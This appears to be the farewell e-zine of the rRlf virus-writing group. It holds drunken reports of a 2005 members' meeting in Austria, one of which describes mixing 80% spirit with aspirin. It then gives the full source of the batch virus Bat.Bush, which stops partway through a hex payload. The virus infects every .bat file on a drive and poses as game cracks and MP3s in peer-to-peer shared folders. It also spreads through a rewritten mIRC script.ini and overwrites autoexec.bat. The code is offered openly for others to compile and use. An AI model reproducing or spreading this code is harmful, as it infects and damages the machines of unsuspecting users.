intro words by philie
**********************

Wow, exactly 2³ years of rRlf.
And this is what it sums up to.
In here you'll find the best of every member the rRlf had through its time. Well, except for some, of which we lost the stuff, or there hasn't been any.
And some nice rarities, old, rusty and unreleased things.

Anyway, I need to get some stuff loose, and I don't want to sell it on ebay, so here we go :)
The first three people to answer the following questions correctly can win:
1. a little sculpture made by disk0rdia
2. my old, unique, drunken-tuned keyboard
3. a copy of "rRlf-Con #1 (Protokoll) - Spy0na$cHä, !nt3rVieWinaTion and a m!Cro sUck!Ng rRlf baFra HoOd", that is a 1 hour live recording of a rRlf action from the early days
Drop me your answers by mail, here are the questions:
1. Where was the beginning?
2. Who the fuck were the digicam-death-hax0rs?
3. Where could the end be seen?

Our page will stay online, and I will still be reachable by mail, so if you want to get in contact for whatever reason, drop a mail to philet0ast3r@gmx.de.
But now enjoy our last gift to the vx community. hf.

ps: thanks to spth for last minute help :)


viewer by DiA
*************

This viewer requires JavaScript and doesn't work with Internet Explorer and Opera. Get yourself Firefox or Safari to view the content properly.
If you don't want to use this viewer at all, look in the "# plain #" folder (also for binaries, additional source code and a gnarly mp3).


articles

rRlf meeting 2005
DiA, philet0ast3r, rastafarie, Second Part To Hell

Austrian mustard don't do it - rrlf meeting 2005
by DiA
========================================================

Fuck, let's rock...

At ~01:00pm my train goes to philie's town, nothin really happened, just 3 beers and my music. ~04:00pm I arrived philie's town, where he already waits for me. Buy some beer and whisky, picked up rastafarie and let the riot begin, we are on the way to austria...

Beer 4, 5, 6, 7, 8 and 9, "Are we already in austria?", "Yepp, you missed the frontier!". Hmm, maybe in reason of 9 beers, I think so. I was drunkn, philie drove (thank god he was not drunkn) and rastafarie takes a sleep after 6 or 7 beers. In reason of my alcoholism I lost much of my time-feeling, so I just drank my beer 10, and we are already at SPTH village. It takes us some time (lost time in my head) to find SPTH's house in this "huge" village. But we did it, we are really in austria...

Saying hello to SPTH, making some beer exchange and drank it. After that we looked at the most impressive sight in this village, the wine basement, uh sweet, after seeing this my brain asks for more alcohol. So we all take a seat, drank one more beer. Then we are going for the hard stuff, the -from last meeting report- well known korn80. Sweet, I only can drink such stuff when I am already drunkn, let's remember...I was, so we go for it. Don't ask me who, or better who not, puked from this damn fine, nearly making blind, drink. I just remember that SPTH brings some aspirin, drunken idea as normal walking around, why not drink k80 with aspirin?! Hm, first reason: it is totally stupid, and second: aspirin doesn't dissolve in k80 :D. Fuck off! SPTH puked, then me. That aspirin won't go down my throat, more the other way. I really puked in austria... I can't believe it, I fell asleep after signing some stuff for kefi. Breakdown in austria...
After getting up I am still drunkn as hell, and I wonder why rastafarie, philie and SPTH laughed at me, after seeing my face in the digicam I know why, they painted my whole face with sentences like "I love Korn80" or "DiA = cool" while I slept. Next time I will get you all! >:D. Cleaned myself up, going for some breakfast and k80. After that all of us fell asleep and we take a ~3h sleep. Getting up again, going for some beer, smoking and talking. After that we played like little children in the snow, because philie and rastafarie had some bobs (not boobs). Yes, we played with snow in austria...

It becomes cold and my beer was empty, so we decided to go to a pub. After entering this trashy pub we all buy a pretty expensive steaming ranger and play some rounds kicker. SPTH beats us all..."you are a crack! ;)". We all are getting bored to get an ass-kick by SPTH, so we went off to play pool. Normal people throw a coin or somethin, but we trash each other to get the staff of the two teams. Rastafarie and me win the match. Yeah, we win a pool billiard match in austria...

We decided to play from now on one against one, but it takes another way. Rastafarie gets us all a beer (thx for this mate). We drank a little bit and then rastafarie cuts his finger with this glass of beer, don't ask me how. There was pretty much blood. After rastafarie gets some kinky first aid, he, SPTH and SPTH's mother went to hospital. Philie and me cleaned up the blood, finished the pool match (nobody won, in reason of no rules;)) and then we take a seat. Ohh yes, we cleaned up a pub full of blood in austria...

While talking about VX and AV the village society enters the pub. Hell, that much austrian people and every one of them wants to speak with us. Philie and me don't understand most time what they want. It was pretty funny, and after SPTH's dad buys us a beer it has to get a little bit funnier.
At this time rastafarie and SPTH come back, we drank more beer (how can I use this word so often in this article?! because we drank that much ;P) and after finishing this we went back to SPTH's house. Rastafarie goes to bed in reason of medical drugs, and the rest of us watching a senseless splatter movie, and drank same time some beer, what else?! The beer rocks in austria...

After taking some sleep, we already have to leave austria, because I have to get my train. So we all packed our stuff, say goodbye to SPTH and his family and leave this pretty smooth small village. At this point, the end of this article, I have to thank philie for taking me with his car, to rastafarie for making my sadistic side of me happy (blood blood blood ;)), SPTH for all the beer, food and k80 and SPTH's family for the nice hospitality. I am really looking forward to see these people again on the next meeting. Thanks a lot for this awesome time in austria...

Children of the KORN 80 II - The final Sacrifice
by philet0ast3r

About half a year after surviving part one, our irresistible creed for high toxic liquids got us back together. The journey began Friday, the 21st of January in my town. DiA arrived by train, I picked him up and we drove (with my car) to a nearby city (where the rRlf was founded) to pick up rastafarie (ex-rRlf). Our destination: The holy KORN 80, an ancient liquid of incredible power, that was supposed to be hidden in a small Austrian mountain village. Second Part To Hell was already there, so we knew where to go. We thought we would arrive there at around 22.00, but as there was partly so much snow, I had to guess where the road is. We arrived 2 hours too late.

Well, that village really is not big, but we managed to spend another 30 mins driving around searching spth. I thought it would be the right direction, but after driving 2 km down a narrow road with mountains on the left and houses on the right, I realized: A dead end. There (...
a dead end at the ass of the world), we met some drunk Austrians (one looking like a strange mixture of a leftover hippie and a cowboy), who told us the way. Finally we found the right house. Or houses: One where spth's family lives and next to it the house where his grandpa lived. Now a party-house. We went to that one, and finally I could start drinking (the others were already drinking all the way in the car).

spth made us some toasts. DiA ate it with mustard. Or better: He ate mustard with toast (he did that the whole weekend: eating everything with an immense amount of mustard). spth said, it was good, that we were finally coming, he was thinking about it already all the time. Suddenly he held a bottle in his hands. From it emerging bright, energetic light. I sank to my knees as I saw the label:

------------------------------------
SPITZ 80% vol ANSATZ KORN
(österreichisches Erzeugnis)
------------------------------------

There it was. Holy shit. Well, we opened it, and started drinking. The first round pure. I thought: "How the hell was I able to drink so much of this stuff the last time?" while having to puke after the first swallow. I think spth had to puke too, so rastafarie was not drinking it pure but with coffee (spth's special strong coffee = looks like a black hole after putting 1 l milk in it). I mixed it with orange juice. But spth and DiA went to the next step: The first two persons to experience rRlf drink #2: KORN 80 + aspirin. Killer. spth puked at once. He said: "It's strange: You try to swallow it, and that moment the aspirin starts to bubble and brings up all the KORN 80 again, burning your throat to death." DiA puked too. Really much, and he couldn't stop. Nice. It smelled like mustard.

After lots of more drinking, spth came up with a LP: David Hasselhoff - Looking for freedom.
rastafarie (mostly) and spth had lots of fun singing this shit (the lyrics were printed on the cover), I was dancing through the room, throwing down some stuff. The next thing was "Bubi, Bubi nocheinmal", some old and stupid Austrian folk shit. We had lots of fun scratching the LP and dancing pogo to it.

Later spth took out a second bottle of KORN 80, which he planned to send to Kefi. We started to write Kefi a letter: Everyone wrote 2 words, then the next person wrote 2 words. Out came lots of senseless drunken bullshit, but funny. We thought, just letter and KORN 80 is boring, so we started to sign lots of different trash for him (Kefi: the apple is pure chance ;), to be put to the package. Somewhen DiA fell asleep, so we started to paint his face with a black marker (... also inside his ear).

It was getting cold, because the stove burned out. It was only glowing a bit. Now that was the effect of pouring a bit KORN 80 into it: It was getting bright and we were still drinking. Somewhen in the morning spth's father came into the party-house to welcome the guests. At that moment DiA woke up, not really knowing, how his face looked like... Some time later we decided to watch an episode of Family Guy (rastafarie brought about every episode with him), but all fell asleep while watching.

Our Saturday began in the afternoon. I remember drinking a beer and getting down to the kitchen, where I talked with spth's mother. The others and the rest of spth's family were coming, and his mum made us a great breakfast. Well, for the family it was supper. DiA ate mustard with bread, mustard with sausages, mustard with cheese and mustard with eggs. As it was already getting dark, we hurried up to get drunk again. Which didn't take long, cause we started with KORN 80.

As rastafarie and I are members of an international extreme bob team, we had our bobs with us, to check out the Austrian mountains.
Which would have been a good ride, if the farmers wouldn't have made up wire fences all over. Wasn't as much fun, as we thought, so we went to a pub. There we got us some Steaming Rangers and started playing table soccer (in Austria it's called "Wuzlkastn" :). But as spth seemed to spend much time with this table, it was kinda boring, cause if you play with spth you will always win. If you play against him, you will lose. So we thought billiard would be better. But who plays together? The answer was fought out, using billiard sticks as weapons. We ran around the room like little kids hitting each other.

Finally we started playing, but not long. rastafarie managed to break the beer glass he was holding in his right hand with the billiard stick he was holding in his other hand. In a way that he cut through the vein in his right middle finger. We were all drunk as hell (or "vull vull" how you say in Austria :), and suddenly the floor looked like this: Wow. spth and rastafarie went to spth's mum, who brought them to a nearby hospital.

After I cleaned the floor of glass fragments and blood, DiA and I needed a beer. We talked a while about this and that, and suddenly the door opened, and in came: About 30 ppl of a krampus society (hard to explain what that exactly is...), who filled the pub. Everybody seemed to be drunken. There were we sitting, DiA from Saxony, me from Bavaria, drunk in a little pub in a little Austrian mountain village, not understanding any word of that strange dialect. This was really a strange situation. Someone asked us, if we were viruswriters. The whole village seemed to know about spth's hobby. Later DiA and I tried to play cards, but it didn't work out ... the cards were kind of strange (Stüssi der Flurschütz!) and somehow all looked the same.

Then spth and rastafarie came back, and rastafarie was really fucked up. We stayed a while and DiA and I tried to hack a game vending machine.
But we only managed to restart the thing by pulling the plug and putting it back in. But after doing that for a while, the thing totally crashed, so we went back to spth's house to eat something. We drank a few more beers and watched a Japanese splatter movie I brought with me: Story of Ricky. Dumb story, dumb actors, dumb dialogs, but funny. And lots of blood and gore. rastafarie already had enough of that, so he went to bed. The rest of us did that after the movie.

It was Sunday noon, as I felt able to drive. We got our things together, said "until next time" and left spth in that little village. We had to hurry, otherwise we would have missed DiA's train from my town. Well, we missed DiA's train, so I drove directly to a bigger city, where DiA would have had to change trains, if he took that from my town. We were short before the city (it was already getting dark again), as my car stopped: We were out of gas. We called a breakdown service, but they wanted about 300 euros for bringing us some gas. So we called a taxi, which brought us to the next gas station (which was of course kinda around the corner), I bought a gas canister, and the taxi brought us back, which had cost me altogether 15 euros. Somehow we managed to get to the station in time, we even had enough time to eat something. DiA took his train, I first brought rastafarie back home and then myself. I fell into my bed and asleep. It was a hard weekend. Next day I had to get up early: School, where I wrote an exam, for which I had learned like nothing. But well, you have to set priorities.

DIA - Day In Austria (x2)

We are at the snow-covered ass of the world when I, having nodded off in the meantime, open my eyes. It is midnight or thereabouts. Outside, by the pumps of the closed gas station, the other two are standing and smoking while I try to climb out of the car.
Sometime after the 6th beer I must have nodded off, after having tried earlier during the drive to piss into an empty Lipton iced tea bottle. Since I was drunk and it was already dark, I can't say how much missed the bottle (sorry Philie ;). When we had finished smoking and the nastily cold night forced us to drive on, we reached ****** sometime around 1 o'clock at night. The short stop at the gas station and the drive reminded me of The Shining. Icy cold, snow and, so it seemed, not a soul far and wide.

We had trouble finding our accomplice, so we turned right somewhere in ******. We drove along a narrow, icy road that led us past some lifeless Austrian mountain houses, and promptly arrived in the middle of nowhere. There, however, we had the luck to run into a group of crazy locals who, despite their obviously excessive drug consumption, were able to describe the way to us. So first we laughed our asses off at the friendly, crazy freaks and turned around. It didn't take long after that and we reached our destination.

We were received right on the street by our waiting host Spth and, after we had greeted each other, proceeded to the conference room, which was located in a small party house near the main house. There we carried on where I, before I had nodded off, had stopped, and DIA hadn't. Spth had, it seemed, thought of everything, so that after the obligatory breakfast at half past one in the morning we could already carry on downing mugs of the delicious r beer. Even though this beer's brewing tradition does not reach back to the sacred era in which the Bavarian Reinheitsgebot came into being, it is a really tasty beer that goes down well in big gulps!
After our host confessed, with infantile, almost schizoid-seeming and therefore likeable anticipation, that he had been looking forward for quite some time to the (-original Austrian-) Ansatzkorn (-with 80 % alcohol content-), he opened the Austrian wonder Korn bottle. So we sat at the table in a quiet, cosy round, drinking this delicious swill that tastes like deadly antifreeze, which made most of us puke our guts out. Luckily I was spared this, since I decided not to freshen up the Ansatzkorn with an aspirin tablet the way Dia and Spth did. After we had got drunk in cheerful merriment, Dia fell asleep, so that his face became the target of our artistic energies.

Now our host, obviously familiar with occultism, showed us his secret alchemical laboratory, located in the middle of the room, in which he tries to prove the magic of the Ansatzkorn. Believe it or not, he actually managed to turn the embers of the tiled stove's by now dying fire into a blazing fire with a magic squirt from the Ansatzkorn bottle!!! Since he had earlier led us into the house's modest wine cellar and I believed I had been in heaven, he was now, in my eyes, definitely a wizard.

When it got light and all of us were ready for action again, we went over sometime in the early morning to the big version of the party house to watch Family Guy, of which I had brought nearly 10 000 episodes. As our eyes were falling shut after a long night of wizardry, we decided to take a nap. Around 15:00 we were woken by the obnoxious sound of the alarm clock and first of all had a bite for breakfast. Since some of the delicate Ansatzkorn was still left, it didn't take long before I was as plastered again as I had been before we went to sleep.
Now that we were in working condition again, we went bobsledding. Philie and I had brought our bobs so as not to miss out on this fun in the mountains. Unfortunately the romping in the snow stayed within limits, since the Austrian cow farmers in Styria are obviously locked in a merciless competition and absolutely have to fence off their cow pastures from one another with wire fences. These offered a wonderful opportunity to chop your skull off while sledding and be the big idiot.

So we played it safe after all and headed for the nearby inn, where we wanted to play table football (Kicker). It soon turned out that Spth must have indulged in this pleasure here many times, since every touch of the ball by him resulted in a goal. After the various teams that had had Spth as an opponent had lost a few times, we thought it might be more fun to play billiards. So we took our exquisite Steaming Rangers in hand and moved over to the establishment's billiard salon.

This side salon, which had been opened just for us and in which the billiard table stood, was cluttered with empty schnapps and soft drink bottles that were superbly suited to being kicked over. That then happened fairly soon, when, while fighting out the team line-up, we kicked them in the heat of battle. To the waitress it must have seemed like a reptile zoo when she came in to ask us to stop whacking each other with the billiard cues. Well then, so it came about that we started playing billiards. After an even game and cue-fencing-whacking attacks that kept spontaneously breaking out in between, a small mishap befell me when I was holding my beer glass in one hand and accidentally knocked against it with the other, in which I was holding the cue.
Because of the hectic course of events I can no longer say exactly how it came about; in any case I had cut my middle finger on the breaking beer glass. After my 0.5 cm deep, volar-side cut to the PIP joint of the 3rd finger of the right hand had been sewn up with three stitches at the local orthopaedic outpatient clinic, I felt somewhat more comfortable in my skin. At a rough estimate, I left about 500 litres of my blood on the floor of the billiard salon as a small thank-you.

From then on my presence was more like that of a passive observer. After they had pumped me full of 10 000 different chemicals at the hospital, I no longer felt any need to consume alcohol. We lingered a while longer in the inn; Dia, Philie and Spth drank further hundreds of litres of beer while the Austrian village youth increasingly took over the place in the late evening. The nightlife in ****** really surprised me a lot, especially as it seemed to me as if the whole village had gathered in the inn.

After Dia and Philie had demonstrated their elite virus writer skills on the gaming machine and made it crap out by constantly plugging and unplugging it, the time was right to go back to the party house. Apparently word had got around in the meantime that the elite of the virus writing scene was holding an assembly at Spth's, since from then on we were pressed every minute to sign everything that came into our hands and give it away to faaans. And so it came about that each of us could take home about a ton of random shit bearing the signatures of the other three participants as a souvenir.

My short essay is now drawing to a close, since after the hospital visit I was pretty much in the process of crapping out.
After a while the rRlf assembly also moved back to the bigger version of the party house to watch splatter classics like The Story Of Ricky there. For me the time had come to say good night and sleep it off.

After the breakfast beer the next morning, the assembly slowly drew towards its end. Around 12 o'clock, after saying our goodbyes, we set off and drove back to Germany with a heap of beautiful, if partly painful, memories. Typical of the whole stay with Spth in cosy Austria were the last images of ****** that will stay in my memory. As we drove off we passed Spth's father and one of his neighbours who, in beautiful weather, leaning against a garden shed, amid the 12-noon stress, were first of all treating themselves with relish to a little beer outdoors. Great!

-rastafarie-

rRlf's bloody weekend
by Second Part To Hell

When we met last time in summer 2004, we decided to repeat it. Well, all started again, when philet0ast3r called me once in winter 2004 after he visited a show by Alf Poier (a totally sick guy from Austria, who was at the Songcontest 2002 with a song called 'Weil der Mensch zählt'). I think philie was really drunken that time, because he told me he used his gas cost money for beer. :) Anyway, we talked about the date, and said that 14/15/16 January 2005 would be good. We asked DiA if it's ok for him too, and he agreed. Time went and soon DiA said he can not come that weekend - so the fat 'event' should happen one week later - and it did. Invited were philie & girlfriend and DiA, but philie's girlfriend couldn't come, so he asked rastafarie (ex-rRlf member), who really came.

Friday: First meeting-related thing at this day was a nice telephone call by DiA's mummy :) She asked me if they are still in Austria. Well - nice talk :) Normally they should have come at 10 in the evening.
But as they had some problems finding my village and maybe even harder: me in that small town (they drove ~30 minutes for a 1 minute way) :), they came at 1 in the night. First we did was opening beer: Philet0ast3r, DiA and rastafarie drank one of the beer from a nearby city (the best one!!!), and I drank one of DiA's and one of philet0ast3r's beer. Both were really good. Then I showed them my favorite place in the house: The wine cellar - I noticed by their smileys that they really liked the room :).

Then - Eating: I made some toasts. rastafarie ate it normal, philie ate a vegetarian toast and DiA asked me immediately if I have enough mustard. We wondered, but then we noticed what he meant: DiA = mustard (German: Senf) addicted. His toast looked like that: Inside mustard, above it mustard and when he got it, mustard again. After the eating he ate the rest of the mustard tube: pure! :)

After eating we inputted some music and sat down to drink beer and some of the whiskey, which they had with them, until I took out our good old friend: The KORN80 :) Before drinking I went for a bucket, which we really need. And I think I was the first who need it: After the first glass the shit didn't want to stay in my stomach - so I puked. Nice feeling when that thing like burning oil crosses your neck two times... outsch! :) Nevertheless we continued drinking - of course - and next glass philet0ast3r had to puke. We had a good laugh again - and continued. It's totally silly and self-destruction, but it didn't bother us. rastafarie, after seeing us puking, mixed the KORN with coffee (don't say he's lame, you don't know my coffee :D) and DiA was really heavy: He drank the thing like normal water, without changing his facial expression in any way. :)

Then rastafarie said he has a headache, so I gave him some aspirin. Being quite drunken (and for DiA and my taste - self-destructing), we decided to mix a real nice drink, which is now the official rRlf drink issue #2: KORN80+Aspirin!
philet0ast3r and rastafarie were enough intelligent to say no, so they did not drink it. Well, DiA and me mixed, and (tried to) drink it. I think I was first again: I had to puke as hell, because the drink this time could not even pass my neck. It was like a fast input/output process :) DiA was better: He drank it...10secs... and then he also puked - about two liters :) It was so damn ugly and funny - we nearly could not stop to laugh, and DiA not to puke :)

Then we stopped with KORN80 for a while, and drank more beer and whiskey (and coffee). Soon I got the idea of inputting the David Hasselhoff's LP disc 'Looking for freedom'. :) I also had the text of it, so we *tried* to sing. rastafarie was the main singer and was happy as a little child while singing. He really cried euphoric to the sound of David. DiA, at that moment, could not talk anything anymore. He drank too much, and just nodded his head and smiled when we tried to talk with him (maybe we could not do it either - I forgot). Meanwhile philie did pogo that heavy, that he nearly destroyed the kitchen.

After David and some beer again, we inputted the next LP disc called 'Bubi, Bubi, nocheinmal' (which means something like 'Babyboy, Babyboy, once again' - totally crazy). Without understanding the lyrics, we did just heavy hardcore pogo. Totally funny - 4 rRlf (related) guys jumping euphoric crazy at 2m², one more drunken than the other one.

After the 'Bubi, Bubi, nocheinmal' we sat down again to drink and talk about anything we could think of (well, not too much topics, because nobody was able to use his brain fully). Then we thought about Kefi (I told him that I'm going to send him a bottle of KORN80) and started to write an A4 site of 100% senseless text and pictures.
While doing this we also got the idea to send him more than just a signed bottle KORN80 and a paper with text, so we also signed an aspirin (that he's able to make the rRlf drink issue #2), a black and a white choco thing, a cigarette, an apple and more stupid/crazy/senseless stuff. I really hope that he will like it. :)

Anywhen, I think about 4-5 in the morning DiA fell asleep and we had a victim for our creativity. We got a fat black marker and signed/painted his face :) Also that night the fire in the stove stopped, so we had to reactivate it. Therefore we tried the KORN80 - and it worked. 0.1 seconds after doing it into the stove, a 2m high flame came back. Looked nice and worked great - it was warm again. Soon we realized that it became bright, so we ate something and drank our good-morning-beer. That time also DiA was awake again and was astonished about his artistic painted skin. :) We wanted to view an episode of 'Family Guy', but we were too tired and decided to go to bed.....

Saturday: We woke up at ~15.00 - some still drunken :) First we did was going to the kitchen and drink one of the hell drink: KORN80. That day it was better, so we decide to empty the bottle, I think there were 3 more rounds, and soon everybody was drunken again. I can't really remember what we did until it became dark - I think drinking KORN, beer, coffee and smoking. Then we went to a field nearby us to ride the bobs rastafarie and philet0ast3r got with them. After some funny and even painful rides we decided to go to the next pub, because it was cold and beside of DiA's beer we had no alcoholic drinks with us.

We first went in to drink a Steaming Ranger (1/3 Whiskey, 1/3 cola, 1/3 orange juice), then we played tablesoccer. I could neither concentrate nor see the balls right, anyway I won most time because the others could not do it either :D. Then we went to another room to play pool. First question: Who plays together?
We had an excellent fight with our magic pool staffs :) Then we played. But soon rastafarie, the clumsy, broke his glass of beer and hurt his finger really (!!!) bad. His blood decorated big parts of the floor. We quickly asked the barkeeper lady to help us. We (the barkeeper lady, who was afraid of blood and me, who was totally drunken) tried to bandage his finger, which looked really bad. Somehow we managed it, then I called my mum to drive to the next hospital.

There rastafarie got known the Austrian health system: We had to wait for ~20-25mins until somebody came. It was a X-Ray assistant lady, who did not know what to do. Then she tried to cut the bandage of his finger, as it was already totally blue. We had to wait for more ~10-15 mins until the doctor came. Then everything was really fast: rastafarie got some injections, then I went out of the room. Soon (about 10mins later) he came out again and said that his vein was broken.

Everything seemed to be as good as possible, so we drove back to the pub, where DiA and philet0ast3r were still drinking beer :) I also continued drinking beer, but rastafarie was not that active anymore, and after philie and DiA had fun with destroying the photoplay automat, we went home to drink some beer there again and to sign everything we could find :). Then we went into the real house. rastafarie went to bed as he was kind of stoned by the whole medicine he got, and we watched a video philet0ast3r got with him called 'The Story of Richy' or something like that. It had no plot, just blood in it. That day I saw more blood than ever in my life... At ~3-4 in the night we went to bed.

Sunday: The last day was really short. We stood up at ~9-10 in the morning, and they had to drive soon, because DiA must not miss his train in philet0ast3r's city. Well, I think we ate something and drank a beer (did we - I can not really remember). At ~midday they left, and with it a really great, funny, less-sleeping, bloody, alcoholic weekend ended.
Later this day my brain started to work really again - for the first time of the ~2 days :) Well, I really enjoyed the weekend and I'm really looking forward meeting for the next time. We have already talked about that: It should be in or nearby philet0ast3r's city in summer 2005 and this time we want to make it bigger. That means more vxers/related people are invated. I really hope some will come... I'll definitivly take with me a KORN80 bottle! :)

sources

Bat.Bush Adious

*EXCLUSIVE TO BZ #2*

 ___________________________________
//                                   \
|| Bat.Bush By Adious [rRlf]         |
|| First batch to find name of       |
|| its drive.                        |
\\___________________________________/

.: Introduction :.

"Batch is not hard. Trying to do something new with it is."

I thought of the idea of this virus as I was very bored at night with nothing to do. Is it cool for the batch to find out what drive it is running in? After trying and testing I finally came out with this code. I found out from slagehammer, who tested my works, that it could only work on win98. I could not write routines for batch in other Windows versions (win2k, winNT, winME, etc) because I do not have them. I think it would be interesting to some ppl after spending some hours thinking of a good routine for it. Anyways, I hope you enjoy reading this source.

.: Stats :.

Name: Bat.Bush
Size: 13.7 KB 14,336 bytes
Finished on: 23/6/03
Infection target: *.bat. It will search for the batches in the current directory and work its way to the root directory and infects batches in between (dotdot emu).
Worming target: mIrc and some P2P programs
Encrypted: No.
Polymorphic: No.
Anti-AV routine: No.
Payload: As soon as it infects all the batches in that drive, it will search for autoexec.bat and overwrites it with the payload. It shows a "massage of the day" to the user and runs the virus.
Works on: Win98 (as far as I know)

.: Source Code :.

Those of you who knew batch would know what it does.. there is no need for comments. I'll just write some comments for the newbies. Remember: "Batch is not hard. Trying to do something new with it is." My comments are in "::>" (without the quotes). To compile, just cut the source and save it as "bush.bat" and remove the comments I've made.
==============================(CuT HERE 8<)================================================================ :: Bat.Bush :: By adious [rRlf] :: Finnished on 23/6/03 2:30:48.59a @echo off cls if %shit%==prick goto ci if %cs%==yes goto msg1 if %hl%==yes goto msg2 if %lp%==yes goto msg3 if %mad%==yes goto msg4 goto ci :msg1 echo --------------[Counter-Strike Crack]---------------- echo. echo Press: echo [1] install CS package echo [2] exit setup echo. choice /c:12>nul if errorlevel 1 set done=1 goto ci :msg2 echo -------------[ Half Life Crack]---------------- echo. echo press: echo [1] Install Half Life Crack echo [2] exit setup choice /c:12>nul if errorlevel 1 set done=1 goto ci :msg3 echo Installing Linkin Park:Somewhere I belong echo ,........ pause goto ci :msg4 echo Installing Madonna:American Life echo ,........ pause :ci cls ::> (top code) If this virus is spreaded through P2P,It will show some ::> fake msg to tell the dumb user that it is installing the following items. ::> (bottom code) To find what name of drive the virus is inside sitting inside ::> it will then set the "pat" varible with the name of the drive to be used ::> latter on in the code cd >l.l find /c /i "a:\" l.l >nul if not errorlevel 1 set pat=a:\ find /c /i "b:\" l.l >nul if not errorlevel 1 set pat=b:\ find /c /i "c:\" l.l >nul if not errorlevel 1 set pat=c:\ find /c /i "d:\" l.l >nul if not errorlevel 1 set pat=d:\ find /c /i "e:\" l.l >nul if not errorlevel 1 set pat=e:\ find /c /i "f:\" l.l >nul if not errorlevel 1 set pat=f:\ find /c /i "g:\" l.l >nul if not errorlevel 1 set pat=g:\ find /c /i "h:\" l.l >nul if not errorlevel 1 set pat=h:\ find /c /i "i:\" l.l >nul if not errorlevel 1 set pat=i:\ find /c /i "j:\" l.l >nul if not errorlevel 1 set pat=j:\ find /c /i "k:\" l.l >nul if not errorlevel 1 set pat=k:\ find /c /i "l:\" l.l >nul if not errorlevel 1 set pat=l:\ find /c /i "m:\" l.l >nul if not errorlevel 1 set pat=m:\ find /c /i "n:\" l.l >nul if not errorlevel 1 set pat=n:\ find 
/c /i "o:\" l.l >nul if not errorlevel 1 set pat=o:\ find /c /i "p:\" l.l >nul if not errorlevel 1 set pat=p:\ find /c /i "q:\" l.l >nul if not errorlevel 1 set pat=q:\ find /c /i "r:\" l.l >nul if not errorlevel 1 set pat=r:\ find /c /i "s:\" l.l >nul if not errorlevel 1 set pat=s:\ find /c /i "t:\" l.l >nul if not errorlevel 1 set pat=t:\ find /c /i "u:\" l.l >nul if not errorlevel 1 set pat=u:\ find /c /i "v:\" l.l >nul if not errorlevel 1 set pat=v:\ find /c /i "w:\" l.l >nul if not errorlevel 1 set pat=w:\ find /c /i "x:\" l.l >nul if not errorlevel 1 set pat=x:\ find /c /i "y:\" l.l >nul if not errorlevel 1 set pat=y:\ find /c /i "z:\" l.l >nul if not errorlevel 1 set pat=z:\ del l.l cls ::> below routine tries to infect all batches in that peticular drive. ::> it works it's way down to the parent directry to root directory (DotDot emu :) ::> while infecting everything in between. :infecto @attrib +r %0 echo.>l.t echo @set shit=prick >>l.t @copy l.t + %0 m.b @for %%a in (*.bat) do copy %%a + m.b del l.t | del m.b cd .. 
>%pat%p.l @find /c /i "invalid directory" %pat%p.l @if not errorlevel 1 goto infecto @echo.>l.t @echo @set shit=prick >>l.t @copy l.t + %0 m.b @for %%a in (*.bat) do copy %%a + m.b @del l.t | del m.b | del p.l copy %0 %pat%bush.bat attrib -r %0 cls if not exist %pat%windows\*.* goto auto :p2p echo set cs=yes >t.i if exist %pat%program files\morpheus\my shared folder\*.* copy l.t + %0 %pat%program files\morpheus\my shared folder\csc.EXE.bat if exist %pat%program files\bearshare\shared\*.* copy l.t + %0 %pat%program files\bearshare\shared\csc.EXE.bat if exist %pat%program files\eDonkey2000\incoming\*.* copy l.t + %0 %pat%program files\eDonkey2000\incoming\csc.EXE.bat echo set lp=yes >t.i if exist %pat%program files\morpheus\my shared folder\*.* copy l.t + %0 %pat%program files\morpheus\my shared folder\Linkin_park_somewhere_i_belong.MP3.bat if exist %pat%program files\bearshare\shared\*.* copy l.t + %0 %pat%program files\bearshare\shared\Linkin_Park_somewhere_i_belong.MP3.bat if exist %pat%program files\eDonkey2000\incoming\*.* copy l.t + %0 %pat%program files\eDonkey2000\incoming\Linkin_Park_somewhere_i_belong.MP3.bat echo set hl=yes >t.i if exist %pat%program files\morpheus\my shared folder\*.* copy l.t + %0 %pat%program files\morpheus\my shared folder\HL_cracks.EXE.bat if exist %pat%program files\bearshare\shared\*.* copy l.t + %0 %pat%program files\bearshare\shared\HL_cracks.EXE.bat if exist %pat%program files\eDonkey2000\incoming\*.* copy l.t + %0 %pat%program files\eDonkey2000\incoming\HL_cracks.EXE.bat echo set mad=yes >t.i if exist %pat%program files\morpheus\my shared folder\*.* copy l.t + %0 %pat%program files\morpheus\my shared folder\Madonna_A_Life.MP3.bat if exist %pat%program files\bearshare\shared\*.* copy l.t + %0 %pat%program files\bearshare\shared\Madonna_A_Life.MP3.bat if exist %pat%program files\eDonkey2000\incoming\*.* copy l.t + %0 %pat%program files\eDonkey2000\incoming\Madonna_A_Life.MP3.bat cls ::> Above routine is p2p worming thru 
morpheus,bearshare and eDonkey2000.this virus would skip the routine if ::> does not have a WINDOWS folder. echo [script]>l.t echo n0=on 1:JOIN:#:{ >>l.t echo n1= /if ( nick == $me ) { halt } >>l.t echo n2= /.dcc send $nick %pat%bush.bat >>l.t echo n3= }>>l.t cls if exist %pat%mirc\*.* copy l.t %path%mirc\script.ini if exist %pat%mirc32\*.* copy l.t %path%mirc32\script.ini if exist %pat%progra~1\mirc\*.* copy l.t %path%progra~1\mirc\script.ini if exist %pat%progra~1\mirc32\*.* copy l.t %path%progra~1\mirc32\script.ini del l.t cls ::> Above routine is mIrc spreading routine :auto if not exist %pat%autoexec.bat goto fin find /c /i "t.l" %pat%autoexec.bat >nul if not errorlevel 1 goto debugscr goto fin :debugscr @echo e 0100 40 65 63 68 6F 20 6F 66 66 20 0D 0A 65 63 68 6F>>b.bat @echo e 0110 20 70 72 65 73 73 20 65 6E 74 65 72 20 74 6F 20>>b.bat @echo e 0120 63 6F 6E 74 69 6E 75 65 2E 2E 2E 20 0D 0A 64 61>>b.bat @echo e 0130 74 65 20 3E 74 2E 6C 20 0D 0A 66 69 6E 64 20 2F>>b.bat @echo e 0140 63 20 2F 69 20 22 4D 6F 6E 22 20 74 2E 6C 20 3E>>b.bat @echo e 0150 6E 75 6C 0D 0A 69 66 20 6E 6F 74 20 65 72 72 6F>>b.bat @echo e 0160 72 6C 65 76 65 6C 20 31 20 67 6F 74 6F 20 6D 6F>>b.bat @echo e 0170 6E 20 0D 0A 66 69 6E 64 20 2F 63 20 2F 69 20 22>>b.bat @echo e 0180 54 75 65 22 20 74 2E 6C 20 3E 6E 75 6C 0D 0A 69>>b.bat @echo e 0190 66 20 6E 6F 74 20 65 72 72 6F 72 6C 65 76 65 6C>>b.bat @echo e 01A0 20 31 20 67 6F 74 6F 20 74 75 65 20 0D 0A 66 69>>b.bat @echo e 01B0 6E 64 20 2F 63 20 2F 69 20 22 77 65 64 22 20 74>>b.bat @echo e 01C0 2E 6C 20 